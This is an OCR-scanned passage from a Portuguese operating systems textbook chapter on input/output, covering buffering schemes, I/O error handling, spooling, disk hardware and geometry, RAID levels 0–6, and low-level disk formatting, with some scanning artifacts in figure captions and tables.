ário é trazida, se necessário, e o buffer copiado ali em 
uma operação. Esse esquema é muito mais eficiente. 

No entanto, mesmo esse esquema melhorado sofre 
de um problema: o que acontece com os caracteres que 
chegam enquanto a página com o buffer do usuário 
está sendo trazida do disco? Já que o buffer está cheio, 
não há um lugar para colocá-los. Uma solução é ter um 
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[FIGURA 5.15 | (a) Entrada não enviada para buffer. (b) Utilização de buffer no espaço do usuário. (c) Utilização de buffer no núcleo 
seguido da cópia para o espaço do usuário. (d) Utilização de buffer duplo no núcleo. 
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segundo buffer de núcleo. Quando o primeiro buffer 
está cheio, mas antes que ele seja esvaziado, o segun- 
do buffer é usado, como mostrado na Figura 5.15(d). 
Quando o segundo buffer enche, ele está disponivel 
para ser copiado para o usuário (presumindo que o usu- 
ário tenha pedido por isso). Enquanto o segundo buffer 
está sendo copiado para o espaço do usuário, o primeiro 
pode ser usado para novos caracteres. Dessa maneira, os 
dois buffers se revezam: enquanto um está sendo copia- 
do para o espaço do usuário, o outro está acumulando 
novas entradas. Esse tipo de esquema é chamado de uti- 
lização de buffer duplo (double buffering). 

Outra forma comum de utilização de buffer é o 
buffer circular. Ele consiste em uma região da memó- 
ria e dois ponteiros. Um ponteiro aponta para a próxima 
palavra livre, onde novos dados podem ser colocados. 
O outro ponteiro aponta para a primeira palavra de da- 
dos no buffer que ainda não foi removida. Em muitas 
situações, o hardware avança o primeiro ponteiro à 
medida que ele acrescenta novos dados (por exemplo, 
recém-chegado da rede) e o sistema operacional avança 
o segundo ponteiro à medida que ele remove e processa 
dados. Ambos os ponteiros dão a volta, voltando para o 
início quando chegam ao topo. 

A utilização de buffer também é importante na saída 
de dados. Considere, por exemplo, como a saída é fei- 
ta para o modem sem a utilização do buffer e usando 
o modelo da Figura 5.15(b). O processo do usuário 
executa uma chamada de sistema write para escrever n 
caracteres. O sistema tem duas escolhas a essa altura. 
Ele pode bloquear o usuário até que todos os caracteres 
tenham sido escritos, mas isso poderia levar muito tem- 
po em uma linha de telefone lenta. Ele também poderia 
liberar o usuário imediatamente e realizar a E/S en- 
quanto o usuário processa algo mais, mas isso leva a um 
problema ainda pior: como o processo do usuário vai 





saber que a saída foi concluída e que ele pode reutilizar 
o buffer? O sistema poderia gerar um sinal ou interrup- 
ção de sinal, mas esse estilo de programação é dificil e 
propenso a condições de corrida. Uma solução muito 
melhor é o núcleo copiar os dados para um buffer de 
núcleo, análogo à Figura 5.15(c) (mas no outro sentido), 
e desbloquear o processo que chamou imediatamente. 
Agora não importa quando a E/S efetiva foi concluída. 
O usuário está livre para reutilizar o buffer no instante 
em que ele for desbloqueado. 

A utilização de buffer é uma técnica amplamente uti- 
lizada, mas ele tem uma desvantagem também: se os 
dados forem armazenados em buffer vezes demais, o 
desempenho sofre. Considere, por exemplo, a rede da 
Figura 5.16. Aqui um usuário realiza uma chamada de 
sistema para escrever para a rede. O núcleo copia um 
pacote para um buffer do núcleo para permitir que o 
usuário proceda imediatamente (passo 1). Nesse ponto, 
o programa do usuário pode reutilizar o buffer. 

Quando o driver é requisitado, ele copia o pacote 
para o controlador para saída (passo 2). A razão pela 
qual ele não transfere da memória do núcleo direta- 
mente para o barramento é que uma vez inicializada 
uma transmissão do pacote, ela deve continuar a uma 
velocidade uniforme. O driver não pode garantir essa 
velocidade uniforme, pois canais de DMA e outros dis- 
positivos de E/S podem estar roubando muitos ciclos. 
Uma falha na obtenção de uma palavra a tempo arruina- 
ria o pacote. A utilização de buffer para o pacote dentro 
do controlador pode contornar esse problema. 

Após o pacote ter sido copiado para o buffer interno 
do controlador, ele é copiado para a rede (passo 3). Os 
bits chegam ao receptor logo após terem sido enviados, 
de maneira que logo após o último bit ter sido enviado, 
aquele bit chega ao receptor, onde o pacote foi arma- 
zenado no buffer do controlador. Em seguida o pacote 
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é copiado para o buffer do núcleo do receptor (passo 
4). Por fim, ele é copiado para o buffer do processo re- 
ceptor (passo 5). Em geral, o receptor envia de volta 
uma confirmação do recebimento. Quando o emissor 
obtém a confirmação, ele está livre para enviar o pró- 
ximo pacote. No entanto, deve ficar claro que toda essa 
operação de cópia vai retardar a taxa de transmissão de 
modo considerável, pois todos os passos devem aconte- 
cer sequencialmente. 


Relatório de erros 


Erros são muito mais comuns no contexto de E/S 
do que em outros contextos. Quando ocorrem, o siste- 
ma operacional deve lidar com eles da melhor maneira 
possível. Muitos erros são específicos de dispositivos 
e devem ser tratados pelo driver apropriado, mas o 
modelo para o tratamento de erros é independente do 
dispositivo. 

Uma classe de erros de E/S é a dos erros de pro- 
gramação. Eles ocorrem quando um processo pede por 
algo impossível, como escrever em um dispositivo de 
entrada (teclado, scanner, mouse etc.) ou ler de um dis- 
positivo de saída (impressora, plotter etc.). Outros erros 
incluem fornecer um endereço de buffer inválido ou ou- 
tro parâmetro e especificar um dispositivo inválido (por 
exemplo, disco 3 quando o sistema tem apenas dois dis- 
cos), e assim por diante. A ação a ser tomada a respeito 
desses erros é direta: simplesmente relatar de volta um 
código de erro para o chamador. 

Outra classe de erros é a que engloba erros de E/S 
reais, por exemplo, tentar escrever em um bloco de disco 
que foi danificado ou tentar ler de uma câmera de vi- 
deo que foi desligada. Se o driver não sabe o que fazer, 
ele pode passar o problema de volta para o software inde- 
pendente do dispositivo. 


Controlador 







O que esse software faz depende do ambiente e da 
natureza do erro. Se for um simples erro de leitura e 
houver um usuário interativo disponível, ele poderá exi- 
bir uma caixa de diálogo perguntando ao usuário o que 
fazer. As opções podem incluir tentar de novo um deter- 
minado número de vezes, ignorar o erro, ou acabar com 
o processo que emitiu a chamada. Se não houver um 
usuário disponível, provavelmente a única opção real 
será relatar um código de erro indicando uma falha na 
chamada de sistema. 

No entanto, alguns erros não podem ser manejados 
dessa maneira. Por exemplo, uma estrutura de dados 
crítica, como o diretório-raiz ou a lista de blocos livres, 
pode ter sido destruída. Nesse caso, o sistema pode ter 
de exibir uma mensagem de erro e desligar. Não há mui- 
to mais que possa ser feito. 


Alocação e liberação de dispositivos dedicados 


Alguns dispositivos, como impressoras, podem ser 
usados somente por um único processo a qualquer dado 
momento. Cabe ao sistema operacional examinar solicita- 
ções para o uso de dispositivos e aceitá-los ou rejeitá-los, 
dependendo de o dispositivo solicitado estar disponível 
ou não. Uma maneira simples de lidar com essas soli- 
citações é exigir que os processos executem chamadas 
de sistema open diretamente nos arquivos especiais para 
os dispositivos. Se o dispositivo estiver indisponível, 
a chamada open falha. O fechamento desse dispositivo 
dedicado então o libera. 

Uma abordagem alternativa é ter mecanismos espe- 
ciais para solicitação e liberação de serviços dedicados. 
Uma tentativa de adquirir um dispositivo que não está 
disponível bloqueia o processo chamador em vez de 
causar uma falha. Processos bloqueados são colocados 
em uma fila. Mais cedo ou mais tarde, o dispositivo 
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solicitado fica disponível e o primeiro processo na fila 
tem permissão para adquiri-lo e continua a execução. 


Tamanho de bloco independente de dispositivo 


Discos diferentes podem ter tamanhos de setores di- 
ferentes. Cabe ao software independente do dispositi- 
vo esconder esse fato e fornecer um tamanho de bloco 
uniforme para as camadas superiores, por exemplo, tra- 
tando vários setores como um único bloco lógico. Des- 
sa maneira, as camadas superiores lidam apenas com 
dispositivos abstratos, que usam o mesmo tamanho de 
bloco lógico, independentemente do tamanho do setor 
físico. De modo similar, alguns dispositivos de carac- 
teres entregam seus dados um byte de cada vez (por 
exemplo, o modem), enquanto outros entregam seus 
dados em unidades maiores (por exemplo, interfaces de 
rede). Essas diferenças também podem ser escondidas. 


5.3.4 Software de E/S do espaço do usuário 


Embora a maior parte do software de E/S esteja den- 
tro do sistema operacional, uma pequena porção dele 
consiste em bibliotecas ligadas aos programas do usuá- 
rio e mesmo programas inteiros sendo executados fora 
do núcleo. Chamadas de sistema, incluindo chamadas 
de sistema de E/S, são normalmente feitas por rotinas de 
biblioteca. Quando um programa C contém a chamada 


count = write(fd, buffer, nbytes); 


a rotina de biblioteca write pode estar ligada com o pro- 
grama e contida no programa binário presente na memória 
no tempo de execução. Em outros sistemas, bibliotecas 
podem ser carregadas durante a execução do programa. 
De qualquer maneira, a coleção de todas essas rotinas de 
biblioteca faz claramente parte do sistema de E/S. 

Embora essas rotinas façam pouco mais do que colo- 
car seus parâmetros no lugar apropriado para a chama- 
da de sistema, outras rotinas de E/S na realidade fazem 
o trabalho de verdade. Em particular, a formatação de 
entrada e saída é feita pelas rotinas de biblioteca. Um 
exemplo de C é printf, que recebe uma cadeia de carac- 
teres e possivelmente algumas variáveis como entrada, 
constrói uma cadeia ASCII, e então chama o write para 
colocá-la na saída. Como um exemplo de printf; consi- 
dere o comando 


printf(“O quadrado de %3d e %6d\n’, i, i*i); 


Ele formata uma cadeia de caracteres constituida de 
14 caracteres, “O quadrado de ” seguido pelo valor i 
como uma cadeia de 3 caracteres, então a cadeia de 3 


caracteres “ e ”, em seguida į? como 6 caracteres, e por 
fim, mais um caractere para mudança de linha. 

Um exemplo de uma rotina similar para entrada é 
scanf, que lê uma entrada e a armazena nas variáveis 
descritas em um formato de cadeia de caracteres usando 
a mesma sintaxe que printf. A biblioteca de E/S padrão 
contém um número de rotinas que envolvem E/S e todas 
executam como parte dos programas do usuário. 

Nem todo software de E/S no nível do usuário consis- 
te em rotinas de biblioteca. Outra categoria importante é 
o sistema de spooling. O uso de spool é uma maneira de 
lidar com dispositivos de E/S dedicados em um sistema 
de multiprogramação. Considere um dispositivo “spoo- 
led” típico: uma impressora. Embora seja tecnicamente 
fácil deixar qualquer processo do usuário abrir o arquivo 
especial de caractere para a impressora, suponha que um 
processo o abriu e então não fez nada por horas. Nenhum 
outro processo poderia imprimir nada. 

Em vez disso, o que é feito é criar um processo espe- 
cial, chamado daemon, e um diretório especial, chamado 
de diretório de spooling. Para imprimir um arquivo, um 
processo primeiro gera o arquivo inteiro a ser impresso e 
o coloca no diretório de spooling. Cabe ao daemon, que 
é o único processo com permissão de usar o arquivo es- 
pecial da impressora, imprimir os arquivos no diretório. 
Ao proteger o arquivo especial contra o uso direto pelos 
usuários, o problema de ter alguém mantendo-o aberto 
por um tempo desnecessariamente longo é eliminado. 

O spooling é usado não somente para impressoras. 
Ele também é empregado em outras situações de E/S. 
Por exemplo, a transferência de arquivos por uma rede 
muitas vezes usa um daemon de rede. Para enviar um 
arquivo para algum lugar, um usuário o coloca em um 
diretório de spooling da rede. Mais tarde, o daemon da 
rede o retira do diretório e o transmite. Um uso em par- 
ticular da transmissão “spooled” de arquivos é o sistema 
de notícias USENET (agora parte do Google Groups). 
Essa rede consiste em milhões de máquinas mundo afo- 
ra comunicando-se usando a internet. Milhares de gru- 
pos de notícias existem em muitos tópicos. Para postar 
uma mensagem de notícias, o usuário invoca um pro- 
grama de notícias, o qual aceita a mensagem a ser pos- 
tada e então a deposita em um diretório de spooling para 
transmissão para outras máquinas mais tarde. Todo o 
sistema de notícias executa fora do sistema operacional. 

A Figura 5.17 resume o sistema de E/S, mostran- 
do todas as camadas e as principais funções de cada 
uma. Começando na parte inferior, as camadas são o 
hardware, tratadores de interrupção, drivers do disposi- 
tivo, software independente de dispositivos e, por fim, 
os processos do usuário. 
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As setas na Figura 5.17 mostram o fluxo de controle. 
Quando um programa do usuário tenta ler um bloco de 
um arquivo, por exemplo, o sistema operacional é invo- 
cado para executar a chamada. O software independente 
de dispositivos o procura, digamos, na cache do buffer. 
Se o bloco necessário não está lá, ele chama o driver 
do dispositivo para emitir a solicitação para o hardware 
ir buscá-lo do disco. O processo é então bloqueado até 
que a operação do disco tenha sido completada e os 
dados estejam seguramente disponíveis no buffer do 
chamador. 

Quando o disco termina, o hardware gera uma in- 
terrupção. O tratador de interrupção é executado para 
descobrir o que aconteceu, isto é, qual dispositivo quer 
atenção agora. Ele então extrai o estado do disposi- 
tivo e desperta o processo dormindo para finalizar a 
solicitação de E/S e deixar que o processo do usuário 
continue. 


5.4 Discos 


Agora começaremos a estudar alguns dispositivos de 
E/S reais. Começaremos com os discos, que são concei- 
tualmente simples, mas muito importantes. Em seguida 
examinaremos relógios, teclados e monitores. 


5.4.1 Hardware do disco 


Existe uma série de tipos de discos. Os mais comuns 
são os discos rígidos magnéticos. Eles se caracterizam 
pelo fato de que leituras e escritas são igualmente rá- 
pidas, o que os torna adequados como memória secun- 
dária (paginação, sistemas de arquivos etc.). Arranjos 
desses discos são usados às vezes para fornecer um 
armazenamento altamente confiável. Para distribuição 
de programas, dados e filmes, discos ópticos (DVDs 
e Blu-ray) também são importantes. Por fim, discos de 


Funções de E/S 


Chama E/S; formata E/S; coloca no spool 


Nomeação, proteção, bloqueio, utilização de buffer e alocação 


Ajusta os registradores do dispositivo; verifica estado 


Acorda driver quando a E/S está completa 


Executa operação de E/S 


estado sólido são cada dia mais populares à medida que 
eles são rápidos e não contêm partes móveis. Nas se- 
ções a seguir discutiremos discos magnéticos como um 
exemplo de hardware e então descreveremos o software 
para dispositivos de discos em geral. 


Discos magnéticos 


Discos magnéticos são organizados em cilindros, 
cada um contendo tantas trilhas quanto for o número 
de cabeçotes dispostos verticalmente. As trilhas são di- 
vididas em setores, com o número de setores em torno 
da circunferência sendo tipicamente 8 a 32 nos discos 
flexíveis e até várias centenas nos discos rígidos. O nú- 
mero de cabeçotes varia de 1 a cerca de 16. 

Discos mais antigos têm pouca eletrônica e trans- 
mitem somente um fluxo de bits serial simples. Nesses 
discos, o controlador faz a maior parte do trabalho. Nos 
outros discos, em particular nos discos IDE (Integra- 
ted Drive Electronics — eletrônica integrada ao disco) 
e SATA (Serial ATA — ATA serial), a própria unidade 
contém um microcontrolador que realiza um trabalho 
considerável e permite que o controlador real emita um 
conjunto de comandos de nível mais elevado. O contro- 
lador muitas vezes controla a cache, faz o remapeamen- 
to de blocos defeituosos e muito mais. 

Uma característica do dispositivo que tem implica- 
ções importantes para o driver do disco é a possibilida- 
de de um controlador realizar buscas em duas ou mais 
unidades ao mesmo tempo. Elas são conhecidas como 
buscas sobrepostas (overlapped seeks). Enquanto o 
controlador e o software estão esperando que uma bus- 
ca seja concluída em uma unidade, o controlador pode 
iniciar uma busca em outra. Muitos controladores tam- 
bém podem ler ou escrever em uma unidade enquanto 
realizam uma busca em uma ou mais unidades, mas 
um controlador de disco flexível não pode ler ou es- 
crever em duas unidades ao mesmo tempo. (A leitura 
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e a escrita exigem que o controlador mova bits em 
uma escala de tempo de microssegundos, então uma 
transferência usa quase todo o seu poder de compu- 
tação.) A situação é diferente para discos rígidos com 
controladores integrados e, em um sistema com mais 
de um desses discos rígidos, eles podem operar simul- 
taneamente, pelo menos até o ponto de transferência 
entre o disco e o buffer de memória do controlador. 
No entanto, apenas uma transferência entre o controla- 
dor e a memória principal é possível ao mesmo tempo. 
A capacidade de desempenhar duas ou mais operações 
ao mesmo tempo pode reduzir o tempo de acesso mé- 
dio consideravelmente. 

A Figura 5.18 compara parâmetros da mídia de ar- 
mazenamento padrão para o PC IBM original com pa- 
râmetros de um disco feito três décadas mais tarde a 
fim de mostrar como os discos evoluíram de lá para cá. 
É interessante observar que nem todos os parâmetros 
tiveram a mesma evolução. O tempo médio de busca é 
quase 9 vezes melhor do que era, a taxa de transferência 
é 16 mil vezes melhor, enquanto a capacidade aumen- 
tou por um fator de 800 mil vezes. Esse padrão tem a 
ver com as melhorias relativamente graduais nas partes 
móveis, mas muito mais significativas nas densidades 
de bits das superfícies de gravação. 

Um detalhe para o qual precisamos atentar ao exami- 
narmos as especificações dos discos rígidos modernos 
é que a geometria especificada, e usada pelo driver, é 
quase sempre diferente do formato físico. Em discos an- 
tigos, o número de setores por trilha era o mesmo para 
todos os cilindros. Discos modernos são divididos em 
zonas com mais setores nas zonas externas do que nas 


internas. A Figura 5.19(a) ilustra um disco pequeno com 
duas zonas. A zona externa tem 32 setores por trilha; a 
interna tem 16 setores por trilha. Um disco real, como 
o WD 3000 HLFS, costuma ter 16 ou mais zonas, com 
o número de setores aumentando em aproximadamente 
4% por zona à medida que se vai da zona mais interna 
para a mais externa. 

Para esconder os detalhes de quantos setores tem 
cada trilha, a maioria dos discos modernos tem uma 
geometria virtual que é apresentada ao sistema opera- 
cional. O software é instruído a agir como se houvesse 
x cilindros, y cabeçotes e z setores por trilha. O contro- 
lador então realiza um remapeamento de uma solicita- 
ção para (x, y, Z) no cilindro, cabeçote e setor real. Uma 
geometria virtual possível para o disco físico da Figura 
5.19(a) é mostrada na Figura 5.19(b). Em ambos os ca- 
sos o disco tem 192 setores, apenas o arranjo publicado 
é diferente do real. 

Para os PCs, os valores máximos para esses três 
parâmetros são muitas vezes (65535, 16 e 63), pela 
necessidade de eles continuarem compatíveis com as 
limitações do PC IBM original. Nessa máquina, cam- 
pos de 16, 4 e 6 bits foram usados para especificar tais 
números, com cilindros e setores numerados começan- 
do em 1 e cabeçotes numerados começando em 0. Com 
esses parâmetros e 512 bytes por setor, o maior disco 
possível é 31,5 GB. Para contornar esse limite, todos os 
discos modernos aceitam um sistema chamado endere- 
camento lógico de bloco (logical block addressing), 
no qual os setores do disco são numerados consecutiva- 
mente começando em 0, sem levar em consideração a 
geometria do disco. 


lei): WE: Parâmetros de disco para o disco flexível original do IBM PC 360 KB e um disco rígido Western Digital WD 3000 HLFS 
































(“Velociraptor”). 
Parâmetro Disco flexível IBM 360 KB Disco rígido WD 3000 HLFS 

Número de cilindros 40 36.481 
Trilhas por cilindro 2 255 
Setores por trilha 9 63 (em média) 
Setores por disco 720 586.072.368 
Bytes por setor 512 512 
Capacidade do disco 360 KB 300 GB 
Tempo de busca (cilindros adjacentes) 6ms 0,7 ms 
Tempo de busca (em média) 77 ms 4,2 ms 
Tempo de rotação 200 ms 6ms 
Tempo de transferência de um setor 22 ms 1,4 us 

















Capítulo 5 ENTRADA/SAÍDA | 257 


le VE) (a) Geometria física de um disco com duas zonas. (b) Uma possível geometria virtual para esse disco. 





RAID 


O desempenho da CPU tem aumentado exponen- 
cialmente na última década, dobrando mais ou menos 
a cada 18 meses, mas nem tanto o desempenho de dis- 
co. Na década de 1970, os tempos de busca nos dis- 
cos de minicomputadores eram de 50 a 100 ms. Hoje 
os tempos de busca atingem alguns ms. Na maioria 
das indústrias técnicas (digamos, automobilística e de 
aviação), um fator de melhoria no desempenho de 5 a 
10 em duas décadas seria uma grande notícia (imagine 
carros andando 125 quilômetros por litro), mas na in- 
dústria dos computadores isso é uma vergonha. Desse 
modo, a diferença entre o desempenho da CPU e o do 
disco (rígido) tornou-se muito maior com o passar do 
tempo. Existe algo que possa ser feito para ajudar nes- 
sa situação? 

Sim! Como vimos, o processamento paralelo está 
cada vez mais sendo usado para acelerar o desempe- 
nho da CPU. Ocorreu a várias pessoas ao longo dos 
anos que a E/S paralela poderia ser uma boa ideia tam- 
bém. Em seu estudo de 1988, Patterson et al. sugeriram 
seis organizações de disco específicas que poderiam 
ser usadas para melhorar o desempenho do disco, sua 
confiabilidade, ou ambos (PATTERSON et al., 1988). 
Essas ideias foram rapidamente adotadas pela indús- 
tria e levaram a uma nova classe de dispositivo de E/S 
chamada RAID. Patterson et al. definiram RAID como 
arranjo redundante de discos baratos (Redundant 
Array of Inexpensive Disks), mas a indústria redefiniu 
o I como “Independent?” em vez de “Inexpensive” (bara- 
to) — quem sabe para cobrarem mais? Já que um vilão 


também era necessário (como em RISC versus CISC, 
também por causa de Patterson), o bandido aqui foi o 
disco único grande e caro (SLED — Single Large 
Expensive Disk). 

A ideia fundamental por trás de um RAID é instalar 
uma caixa cheia de discos junto ao computador, em ge- 
ral um grande servidor, substituir a placa controladora 
de disco com um controlador RAID, copiar os dados 
para o RAID e então continuar a operação normal. Em 
outras palavras, um RAID deve parecer com um SLED 
para o sistema operacional, mas ter um desempenho 
melhor e mais confiável. No passado, RAIDs consis- 
tiam quase exclusivamente em um controlador SCSI 
RAID mais uma caixa de discos SCSI, pois o desem- 
penho era bom e o SCSI moderno suporta até 15 dis- 
cos em um único controlador. Hoje, muitos fabricantes 
também oferecem RAIDs (mais baratos) baseados no 
SATA. Dessa maneira, nenhuma mudança no software 
é necessária para usar o RAID, um grande atrativo para 
muitos administradores de sistemas. 

Além de se parecer como um disco único para o 
software, todos os RAIDs têm a propriedade de que 
os dados são distribuídos pelos dispositivos, a fim de 
permitir a operação em paralelo. Vários esquemas di- 
ferentes para fazer isso foram definidos por Patterson 
et al. Hoje, a maioria dos fabricantes refere-se às sete 
configurações padrão com RAID nivel 0 a RAID nível 
6. Além deles, existem alguns outros níveis secundários 
que não discutiremos. O termo “nível” é de certa manei- 
ra equivocado, pois nenhuma hierarquia está envolvida; 
simplesmente há sete organizações diferentes possíveis. 
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O RAID nivel 0 está ilustrado na Figura 5.20(a). Ele 
consiste em ver o disco único virtual simulado pelo RAID 
como dividido em faixas de k setores cada, com os setores 
0 a k-— 1 sendo a faixa 0, setores ka 2k— 1 faixa 1, e assim 
por diante. Para k = 1, cada faixa é um setor, para k = 2 
uma faixa são dois setores etc. A organização do RAID 
nível 0 grava faixas consecutivas nos discos em um estilo 
de alternância circular (round-robin), como descrito na Fi- 
gura 5.20(a) para um RAID com quatro discos. 

Essa distribuição de dados por meio de múltiplos discos 
é chamada de striping. Por exemplo, se o software emitir 
um comando para ler um bloco de dados consistindo em 
quatro faixas consecutivas começando no limite de uma 
faixa, o controlador de RAID dividirá esse comando em 
quatro comandos separados, um para cada um dos quatro 
discos, e os fará operarem em paralelo. Desse modo, temos 
E/S paralela sem que o software saiba a respeito. 

O RAID nível 0 funciona melhor com grandes solicita- 
ções, quanto maiores melhor. Se uma solicitação for maior 
que o produto do número de discos pelo tamanho da faixa, 
alguns discos receberão múltiplas solicitações, assim quan- 
do terminam a primeira, eles iniciam a segunda. Cabe ao 
controlador dividir a solicitação e alimentar os comandos 
apropriados para os discos apropriados na sequência cer- 
ta e então montar os resultados na memória corretamente. 
O desempenho é excelente e a implementação, direta. 

O RAID nível O funciona pior com sistemas opera- 
cionais que habitualmente pedem por dados um setor de 
cada vez. Os resultados estarão corretos, mas não haverá 
paralelismo e, por conseguinte, nenhum ganho em de- 
sempenho. Outra desvantagem dessa organização é que 
a sua confiabilidade é potencialmente pior do que ter um 
SLED. Se um RAID consiste em quatro discos, cada 
um com um tempo médio de falha de 20 mil horas, cerca 
de uma vez a cada 5 mil horas um disco falhará e todos 
os dados serão completamente perdidos. Um SLED com 
um tempo médio de falha de 20 mil seria quatro vezes 
mais confiável. Como nenhuma redundância está presen- 
te nesse projeto, ele não é de fato um RAID. 

A próxima opção, RAID nível 1, mostrada na Figu- 
ra 5.20(b), é um RAID de fato. Ele duplica todos os 
discos, portanto há quatro discos primários e quatro de 
backup. Em uma escrita, cada faixa é escrita duas vezes. 
Em uma leitura, cada cópia pode ser usada, distribuindo 
a carga através de mais discos. Em consequência, o de- 
sempenho de escrita não é melhor do que para um disco 
único, mas o desempenho de leitura pode ser duas vezes 
melhor. A tolerância a falhas é excelente: se um disco 
quebra, a cópia é simplesmente usada em seu lugar. A 
recuperação consiste em apenas instalar um disco novo 
e copiar o backup inteiro para ele. 


Diferentemente dos níveis O e 1, que trabalham 
com faixas de setores, o RAID nível 2 trabalha com 
palavras, talvez mesmo com bytes. Imagine dividir 
cada byte de um único disco virtual em um par de 
pedaços de 4 bits cada, então acrescentar um código 
Hamming para cada um para formar uma palavra de 7 
bits, das quais os bits 1, 2 e 4 são de paridade. Imagine 
ainda que os sete discos da Figura 5.20(c) foram sin- 
cronizados em termos de posição do braço e posição 
rotacional. Então seria possível escrever a palavra de 7 
bits codificada com Hamming nos sete discos, um bit 
por disco. 

O computador CM-2 da Thinking Machines usava 
esse esquema, tomando palavras de dados de 32 bits e 
adicionando 6 bits de paridade para formar uma palavra 
Hamming de 38 bits, mais um bit extra para paridade 
de palavras, e espalhando cada palavra sobre 39 discos. 
O ganho total era imenso, pois em um tempo de setor 
ele podia escrever o equivalente de 32 setores de dados. 
Também, a perda de um disco não causava problemas, 
pois isso equivalia a perder 1 bit em cada palavra de 39 
bits, algo que o código Hamming podia manejar sem a 
necessidade de parar o sistema. 

A desvantagem é que esse esquema exige que todos 
os discos tenham suas rotações sincronizadas, e isso só 
faz sentido com um número substancial de discos (mes- 
mo com 32 discos de dados e 6 discos de paridade, a 
sobrecarga é 19%). Ele também exige muito do contro- 
lador, visto que é necessário fazer a verificação de erro 
do código Hamming a cada chegada de bit. 

O RAID nível 3 é uma versão simplificada do RAID 
nível 2. Ele está ilustrado na Figura 5.20(d). Aqui um 
único bit de paridade é calculado para cada palavra 
de dados e escrito para o disco de paridade. Como no 
RAID nível 2, os discos devem estar exatamente sincro- 
nizados, tendo em vista que palavras de dados individu- 
ais estão espalhadas por múltiplos discos. 

Em um primeiro momento, poderia parecer que um 
único bit de paridade fornece apenas a detecção de er- 
ros, não a correção deles. Para o caso de erros não de- 
tectados aleatórios, essa observação é verdadeira. No 
entanto, para o caso de uma quebra de disco, ele forne- 
ce a correção completa do erro de 1 bit, pois a posição 
do bit defeituoso é conhecida. Caso um disco quebre, 
o controlador apenas finge que todos os bits são Os. Se 
uma palavra tem um erro de paridade, o bit do disco 
quebrado deve ter sido um 1, então ele é corrigido. Em- 
bora ambos os níveis RAID 2 e 3 ofereçam taxas de 
dados muito altas, o número de solicitações de E/S se- 
paradas por segundo que eles podem tratar não é melhor 
do que para um único disco. 
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[FIGURA 5.20 | Níveis RAID 0 a 6. Os discos de backup e paridade estão sombreados. 
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RAID nível 6 
Os níveis RAID 4 e 5 trabalham novamente com fai-  5.20(e)] é como o RAID nível 0, com uma paridade fai- 
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são processadas juntas por meio de um OU EXCLUSI- 
VO, resultando em uma faixa de paridade de k bytes de 
comprimento. Se um disco quebra, os bytes perdidos 
podem ser recalculados do disco de paridade por uma 
leitura do conjunto inteiro de discos. 

Esse projeto protege contra a perda de um disco, mas 
tem um desempenho ruim para atualizações pequenas. 
Se um setor for modificado, é necessário ler todos os 
arquivos a fim de recalcular a paridade, que então deve 
ser reescrita. Como alternativa, ele pode ler os dados 
antigos do usuário, assim como os dados antigos de 
paridade, e recalcular a nova paridade a partir deles. 
Mesmo com essa otimização, uma pequena atualização 
exige duas leituras e duas escritas. 

Em consequência da carga pesada sobre o disco de 
paridade, ele pode tornar-se um gargalo. Esse gargalo é 
eliminado no RAID nível 5 distribuindo os bits de pari- 
dade uniformemente por todos os discos, de modo cir- 
cular (round-robin), como mostrado na Figura 5.20(f). 
No entanto, caso ocorra uma quebra do disco, a recons- 
trução do disco falhado é um processo complexo. 

O RAID nível 6 é similar ao RAID nível 5, exceto 
que um bloco de paridade adicional é usado. Em outras 
palavras, os dados são divididos pelos discos com dois 
blocos de paridade em vez de um. Em consequência, as 
escritas são um pouco mais caras por causa dos cálculos 
de paridade, mas as leituras não incorrem em nenhuma 
penalidade de desempenho. Ele oferece mais confiabili- 
dade (imagine o que acontece se um RAID nível 5 en- 
contra um bloco defeituoso bem no momento em que ele 
está reconstruindo seu conjunto). 


5.4.2 Formatação de disco 


Um disco rígido consiste em uma pilha de pratos de 
alumínio, liga metálica ou vidro, em geral com 8,9 cm 
de diâmetro (ou 6,35 cm em notebooks). Em cada prato 
é depositada uma fina camada de um óxido de metal 
magnetizado. Após a fabricação, não há informação al- 
guma no disco. 

Antes que o disco possa ser usado, cada prato deve 
passar por uma formatação de baixo nível feita por 
software. A formatação consiste em uma série de trilhas 
concêntricas, cada uma contendo uma série de setores, 
com pequenos intervalos entre eles. O formato de um 
setor é mostrado na Figura 5.21. 


[e PAD Um setor de disco. 


O preâmbulo começa com um determinado padrão 
de bits que permite que o hardware reconheça o começo 
do setor. Ele também contém os números do cilindro e 
setor, assim como outras informações. O tamanho da 
porção de dados é determinado pelo programa de for- 
matação de baixo nível. A maioria dos discos usa seto- 
res de 512 bytes. O campo ECC contém informações 
redundantes que podem ser usadas para a recuperação 
de erros de leitura. O tamanho e o conteúdo desse cam- 
po variam de fabricante para fabricante, dependendo 
de quanto espaço de disco o projetista está disposto a 
abrir mão em prol de uma maior confiabilidade, assim 
como o grau de complexidade do código de ECC que 
o controlador é capaz de manejar. Um campo de ECC 
de 16 bytes não é incomum. Além disso, todos os dis- 
cos rígidos têm algum número de setores sobressalentes 
alocados para serem usados para substituir setores com 
defeito de fabricação. 

A posição do setor O em cada trilha é deslocada com 
relação à trilha anterior quando a formatação de baixo 
nível é realizada. Esse deslocamento, chamado de des- 
locamento de cilindro (cylinder skew), é feito para me- 
lhorar o desempenho. A ideia é permitir que o disco leia 
múltiplas trilhas em uma operação contínua sem perder 
dados. A natureza do problema pode ser vista exami- 
nando-se a Figura 5.19(a). Suponha que uma solicitação 
precise de 18 setores começando no setor 0 da trilha 
mais interna. A leitura dos primeiros 16 setores leva a 
uma rotação de disco, mas uma busca é necessária para 
mover o cabeçote de leitura/gravação para a trilha se- 
guinte, mais externa, no setor 17. No momento em que 
o cabeçote se deslocou uma trilha, o setor O já passou 
por ele, então uma rotação inteira é necessária até que 
ele volte novamente. Esse problema é eliminado deslo- 
cando-se os setores como mostrado na Figura 5.22. 

A intensidade de deslocamento de cilindro depen- 
de da geometria do disco. Por exemplo, um disco de 
10.000 RPM (rotações por minuto) leva 6 ms para rea- 
lizar uma rotação completa. Se uma trilha contém 300 
setores, um novo setor passa sob o cabeçote a cada 20 
us. Se o tempo de busca de uma trilha para outra for 
800 us, 40 setores passarão durante a busca, então o 
deslocamento de cilindro deve ter ao menos 40 seto- 
res, em vez dos três mostrados na Figura 5.22. Vale a 
pena observar que o chaveamento entre cabeçotes tam- 
bém leva um tempo finito; portanto, existe também um 
deslocamento de cabeçote assim como um de cilindro, 


mas o deslocamento de cabeçote não é muito grande, 
normalmente muito menor do que um tempo de setor. 

Como resultado da formatação de baixo nível, a 
capacidade do disco é reduzida, dependendo dos ta- 
manhos do preâmbulo, do intervalo entre setores e do 
ECC, assim como o número de setores sobressalentes 
reservado. Muitas vezes a capacidade formatada é 20% 
